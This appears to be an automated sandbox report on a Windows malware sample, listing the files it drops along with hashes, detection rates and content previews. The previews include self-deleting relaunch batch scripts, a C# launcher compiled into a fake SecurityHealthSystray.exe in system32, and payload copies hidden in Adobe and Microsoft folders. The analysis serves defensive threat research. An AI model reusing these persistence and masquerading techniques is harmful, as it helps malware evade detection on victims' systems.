SHA-512:	1E148A5E28B69B87D017E563C53C5DC76C600F6859EA8BBB64FF1B6EC371839364CBD8952EF8B495BC799C3A6CAB87A4F5CE08192CA264D78B5D1EB064027921
Malicious:	false
Preview:	wT6zpxNIDLI4xkWziV9BzRv5bxHVE3YkEt76ewkN6lGy93BG57wV3MXeiBY2p1EKxhzEmZVvuwFOK66hwAZGGCq2WcYdYshEh6BbE7dgmAlHHJUlE0Fpb8Dv16rJB2XCOArO5fdzh3eGbivNIxYhm2mi2PjHPTetmj3GcFpjXPHie7USLeAOe0ZVYIWq5WkNZud2ppvDIyJXuEE55R6vSQPw

C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	875520
Entropy (8bit):	5.423523110623198
Encrypted:	false
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
MD5:	5780DBAE6AC61A88C8D89F216F324146
SHA1:	CEBCEBEDC7AAEA3A4DD1FBEC933CD169BF92E9DC
SHA-256:	4B1967B04039C9B7A23651043B38C895CCA2EB560DE30A960368F82549079605
SHA-512:	8A595384247649E31EF0C69A63243199D224334D75B66FD486A8E6BA0AC3C2B5521E1EAD4B64FB9C968C21A4836581DDE10E78F36217B62862C40BED2D105920
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@.................................xr..S....... ............................................................................ ............... ..H............text....R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............Z..............@..B.................r......H.......X... .......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Adobe\Acrobat DC\Resource\Font\e589e10572e94b

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with very long lines (387), with no line terminators
Category:	dropped
Size (bytes):	387
Entropy (8bit):	5.822509303351788
Encrypted:	false
SSDEEP:	12:Kr0DcviEKk/F2Ic8xItxQQeGHOFMGYvQ3o5dH:y2wUhpqQeGHOqGUQ3I
MD5:	BAF484616998F19D24ABEF0000B7DF68
SHA1:	F171C1085BBFE1C580883ACE8DBB31BEB507BC89
SHA-256:	BA33F3909F2DB63F72A138E97C77A179E492342E1841637DBE7013596C9061E6
SHA-512:	DFF5A88BC69E56C5749DBB68AD2EDAA3221A32A69977B738AFED46A5BB3B0BE7A04D4DD8F8C0D9E77824D4FE24B35024B3DA1AC641333E45D56D7677E2AAA119
Malicious:	false
Preview:	QF7Q4l6GI7egbYQBYeeYAfwtftrpugEKXR2GUZ0d5QunjRCQ0spjYBXuTOvL3QWm2UJKfKq9oBctvIKNrbzB0fvW3IwGnojo4HuOI1uqBq5Xio8KDhebbUvWiwQXXkW9bxynY5FzrI9KkXxPJmDFKIMkWXpVlWTbU66uzUwIcptTUlwL8AOvgQyTkORAPtNVyi0obDayz4mfY3QuleXkIi5DHnJlDw2tbYfwvIu5kZ5lnT4r7gYuWnNPnwgx3yvDC3DAYd9cub9snTaxscngXHXxLPJ9l6Bwo2juP4Teh6A4oemTVtEbKOp4fQyIUA0yaNEutphyIJ9bHdJrmzn21jlZNpP9FKJgGMeaZ1kpMQTBOOwCGHffW860lphDahs79dU

C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	875520
Entropy (8bit):	5.423523110623198
Encrypted:	false
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
MD5:	5780DBAE6AC61A88C8D89F216F324146
SHA1:	CEBCEBEDC7AAEA3A4DD1FBEC933CD169BF92E9DC
SHA-256:	4B1967B04039C9B7A23651043B38C895CCA2EB560DE30A960368F82549079605
SHA-512:	8A595384247649E31EF0C69A63243199D224334D75B66FD486A8E6BA0AC3C2B5521E1EAD4B64FB9C968C21A4836581DDE10E78F36217B62862C40BED2D105920
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@.................................xr..S....... ............................................................................ ............... ..H............text....R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............Z..............@..B.................r......H.......X... .......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Microsoft\e589e10572e94b

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with very long lines (688), with no line terminators
Category:	dropped
Size (bytes):	688
Entropy (8bit):	5.887422996082905
Encrypted:	false
SSDEEP:	12:pWYnmXOTVnH3k0xpIBVznMto7ZQ10cUGMWbk73DHKKZu1CM9ydiwzx3QvhwC:pWYnyKVnH0MIzjGeQ+ceWQDDqFMMEx3U
MD5:	191386D4B5B5458B584848B425CED791
SHA1:	BE46B3AF90996B359521638757D188B6E01E62D8
SHA-256:	D57758CA91D1ED878236D5796F3EB2C428F6B817BD19BBF5690E4E0FE7ABA916
SHA-512:	BECF5175262E4ABC26EBEE772904062479D8F67F9770D098393BCFA432DD278D1A85169F172A5B4135E23582C3903B0E5BE56AC9A81EF1E27BA679CCF6CBECA0
Malicious:	false
Preview:	RskYofURDFwUsu9cGEux27KB1zIgtLFNy29Pj0RzImfyW448c4qESaxUijgyWxh29igzvt2Qx5pQcVo75KEzeA5XForATdcUEnyxYENsBaRWvh2M4j2MssX8mIuGC26TcULzh1i16WxEtimhwfFulQmWPzLPUHpId74aWDpDABQW4TPDgMThwMsMsyjrpThyqpkvoLLt0CtkAPc5kHsHyIWRPrshd7XrebqPtdZVBjrudIMcWoGikZAhTTg6coQ2oBFijNLHsXGPblxHfQKy1zGEaI6a7c2XSyFbCn2Jc8zNTvFrfYaMdcBz5BHbQvKPes6ngVF2XBV293upCO5iCq40xQgAfb2ryktlycKJTiybGIzCQcYB0mNxyGzQyEW5IoDZJJ1kEvOd1cuoaeuDD01MX5wsm4UPM3SbFa2Glx7EXt6VVLzUTS2Sw1COXI7Ja9R8JSjAmncP2xyn9aWbEA53BApNXntc0yoYc7LDlzrq0mZ9CZO6vfEZDY7JnWm849ZEIaKBPT0PTPCYkpL8YxqVtOVEABZPMtw0NV0lONrbpzGyVij7KnjGTEU4FGBN3kCjdMLPzjuLGOp4HgsbcbEjJphIA5gHLdiEwgUIWTIl3XAEYaxiXjubgdaxpCP3Cm9mqlHkLkEJTcqvodujI7umtGiTGhcUEPjQYYXwTNWxflID

C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	875520
Entropy (8bit):	5.423523110623198
Encrypted:	false
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
MD5:	5780DBAE6AC61A88C8D89F216F324146
SHA1:	CEBCEBEDC7AAEA3A4DD1FBEC933CD169BF92E9DC
SHA-256:	4B1967B04039C9B7A23651043B38C895CCA2EB560DE30A960368F82549079605
SHA-512:	8A595384247649E31EF0C69A63243199D224334D75B66FD486A8E6BA0AC3C2B5521E1EAD4B64FB9C968C21A4836581DDE10E78F36217B62862C40BED2D105920
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@.................................xr..S....... ............................................................................ ............... ..H............text....R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............Z..............@..B.................r......H.......X... .......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\k1iZHyRK6K.exe.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2041
Entropy (8bit):	5.374034001672589
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktVTqZ4vb
MD5:	553B6EF1B0572462CC8BF3E338B09385
SHA1:	11BBCF871361CC815C2261F2A6A4230DC88D5993
SHA-256:	58AF346985F4101CBCBB7F2E6269A3E1A5C523B8C121EC7E79F445CB03CDECCE
SHA-512:	CA38CEABE6E4425D67B599EADF775A2626A5DCB5B2C956B88349FAB257A98678215C6A9C4E8139799C4FFD7043FF74DC71C0B7556ABB120BCB6589B2023B57CA
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lMBSkpoWMYaHkUMNHfb.exe.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\5m3ZlmXzub

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:TRBJ2SZqhE4:1BJ1Zqhv
MD5:	60D97A0D40CE2337FB086089817355B3
SHA1:	47F281D0B258D8AC60EEE99004EF315B65C9F335
SHA-256:	DE3580A236B94E07D952DA4E74DAB15A0DB476BBC695C0FCDBB9A37CD4059F78
SHA-512:	86A9CD238718E4BEF1C7CC5465B9DE41DF45096ED56905F60E3C04C8307D1F9B2CF20AD2BAF7904E34AF55FFF7C22DC30B60CCE823B75E537DA7B7F85FE218AD
Malicious:	false
Preview:	bsQT2H7aRlS76CGOR4tStRPQ2

C:\Users\user\AppData\Local\Temp\9sRvO7pkQj

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:LIKirxKNKTSm:L3Sx7V
MD5:	7DD6919487AF1EF988EC5814D16E6B57
SHA1:	0D67B97318C0CEE9CCFB187F273E4FC47ABB3684
SHA-256:	71BE055405E1416EFE9F1FB98D7A4F5E3A750282EC50DF2C794578457D7143FC
SHA-512:	DB98448D37BFC7C9C4EDD74E2E71DBF678289BE02886EF0946C43571A3AF7017035D88409475B770CB3A3C9B3921BE011550DBBBD6BB8BD44B93B1C2EC8C2A5B
Malicious:	false
Preview:	L83M28ooKHPnyuThPohVCv30C

C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	247
Entropy (8bit):	5.334622868066525
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5SMLKKBu6D7pvFLCvKOZG1wkn23fph:HTg9uYDEfSMdBuUdvFmDfBh
MD5:	627222E6A35763108B94F4543A898BC0
SHA1:	29B058E8A71F93BC1D9F7E41DAE1A924FDB218EA
SHA-256:	26082C81E49F7CCD8A0D9E7C797F6B039000109F8B1A6C2FEA3EA77F8E557F53
SHA-512:	4DC3CA10144E4DAE42CA9AB7FF94760C43EEEFA6C827B1D9FC57C7EC62EABFB7A1FCAB65AFDBF6DB3E57E7BE01DCC56102DECAEB225BA6AD112E40C84303B42D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\JanKBv1Gj5.bat"

C:\Users\user\AppData\Local\Temp\RES5941.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Sun Nov 3 02:32:55 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1952
Entropy (8bit):	4.553713310845572
Encrypted:	false
SSDEEP:	24:H9bW96XOwjJtDfHUwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:ewjJx7KhmMluOulajfqXSfbNtmh5Z
MD5:	BB468B7392D5122C5C81D11D786B2AA4
SHA1:	7F55DC482F14511F69163BE3C68F2FA2773667FB
SHA-256:	A6BBBF27D4C10D826D483504072EFFEF020A8781ED10ADAEA14007B2C212D87E
SHA-512:	E4F7F53F0E93D9FAF5BE81B7F43527E307C25D44E8F1F01A6CA5BE91B79387964EE0A8EF52287270AFC19512EE3FD50581B9B00A0BC1CFC8AED698172FDF6FEC
Malicious:	false
Preview:	L.....&g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES5941.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	165
Entropy (8bit):	5.251431905090049
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1t+WfWOZTzASBktKcKZG1t+kiE2J5xAIbyeG:hCRLuVFOOr+DE1wvOJASKOZG1wkn23fk
MD5:	0D3CCAC541E153551A5227B4A5AA4EAD
SHA1:	4FB925797EC8FD18EC5F175BA95214F51878C7DF
SHA-256:	4333CE15E5DAFC275A1941D1DC6C36C68F2795029925165E48FDA16D0A818D94
SHA-512:	13A846F9818CCF8D57C600BACAE9BD658348947F2120670CC5FE20FE63CCD9A5A61AFEAD5C24369246C119BCBD53ED5A34481820E14348CB8D6AD70DA026F863
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\k1iZHyRK6K.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\YzuQZSWjCd.bat"

C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.0.cs

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.075979308645852
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL662uvFCaiFkD:JNVQIbSfhV7TiFkMSfhWz7FkD
MD5:	E94D60340838E63BB3E8A680BF09ECE1
SHA1:	105D15775C53538DC58C0BA68410DC55593B9432
SHA-256:	111969C19C07DCFBA68A38043EF5F1DACB2D83BA172C8C749EF219BD244FE625
SHA-512:	05CBA330F8CE04B991C377EC0898ED259FC75B58F0DFFE8A3DD99E7685CFCA5985E193DE3BFD1B30731D6646355435A539C3044EC6EE1A697CAE63C6A9786291
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.091864457572706
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fnx8An:Hu7L//TRq79cQWf/x8An
MD5:	D1185D66081E3EF1842B62413FF97D60
SHA1:	CADD33AE5733323928AB68ECC841F66D4315C1FC
SHA-256:	D7048C9E2679F511D79AB89A808CE51BC54F6E3DA6268B21976A3698C4B26C11
SHA-512:	5B93CB777157C27E08226AB74117A5C0A466AFA0F003B08EF69C5F994A421401A2DE7E1D5E2C37313BBC25F67483FA584C1D3466D86F5EA6382526136EED7D53
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.0.cs"

C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.out

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
Category:	modified
Size (bytes):	750
Entropy (8bit):	5.261371580340368
Encrypted:	false
SSDEEP:	12:KJN/I/u7L//TRq79cQWf/x8AuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf/x8AuKax5DqBVKVrj
MD5:	C4F2DD906A8D678A57EC7CF3959857BC
SHA1:	E7D2DEDF5E96E4AD1728457D4726C56D04D2127C
SHA-256:	C574EC934B0AE304F47395AB7757C25DD4D8D6F62222EF410A592E2798416EF9
SHA-512:	8EE079B72D94A3554329EA3B57F27D9D500361193C64F4B2537320A63FBCAFF71393731596F10E46310D0EB671A7452CFF533FAEEFDFD1E0570A1FEE1FD7E91C
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\6785574bad6945

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with very long lines (386), with no line terminators
Category:	dropped
Size (bytes):	386
Entropy (8bit):	5.845455995660874
Encrypted:	false
SSDEEP:	12:MnWMz/5YD5Cb8IvQXw9h7ZEIkpV+JgMOo8:MWTD5XEQaBwiJgMv8
MD5:	81B05E57F88A4E75FDC0376794ADAB35
SHA1:	FE4B43A5C6F15DEFC474B357237152F6737DB90C
SHA-256:	54BEEF227CCCA7DC7342148EB6EF0A312FC7194A14E2FD86A37DF515CE5532B9
SHA-512:	DC9B22BB9E81EAE0074BB4A663D803052CDB6D737CAF69253F32B91FC2424B90F15EF0115D90F1C918859FAEFDEF12D76685E73FEB7879D7799F05FF036BE044
Malicious:	false
Preview:	ZuoOUzdb4Tf5aQP7wTzMG4d7rMVo97dj9BkQw8FYVnXFs1cTXdecdEQfQqgIeyc6z66Yq8LxOa1dgXPzuBRgcBG4vEAFb74gLaQw5DmZSqOCMx83brYch5ex0Bnl8FWQgVSGGc4qZ1OvxDs8FGoujb8P5c63ZAaNU7g1e2w8wrDprsAwTpg1alrFWCKogARYbAbzh0dNUq71YShNcJkueiwsPbfbrIbvapOqQKPdMShtn0rDf7MXag32NskGVBgMPLbsE06R3GhMBDEZub6u5DV3vVdikJILvUecY89oA4eT9r0KnLW3EwQL0h6sXYrt8WaqjmAvbRtBjB4EeS4YxOG9ESl0BRRmNuUmQKlAKkcwCPmyn2NFdS6uQamQBJuKAH

C:\Users\user\Desktop\CdzqKGoc.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: teh76E2k50.exe, Detection: malicious, Browse Filename: 8mmCiIv2Y1.exe, Detection: malicious, Browse Filename: FuWRu2Mg82.exe, Detection: malicious, Browse Filename: VfKk5EmvwW.exe, Detection: malicious, Browse Filename: UwKpCJ6l4p.exe, Detection: malicious, Browse Filename: auXl1Tzyme.exe, Detection: malicious, Browse Filename: cGZV10VyWC.exe, Detection: malicious, Browse Filename: oLlotc8NO3.exe, Detection: malicious, Browse Filename: PbfYaIvR5B.exe, Detection: malicious, Browse Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\EOeGRUzU.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
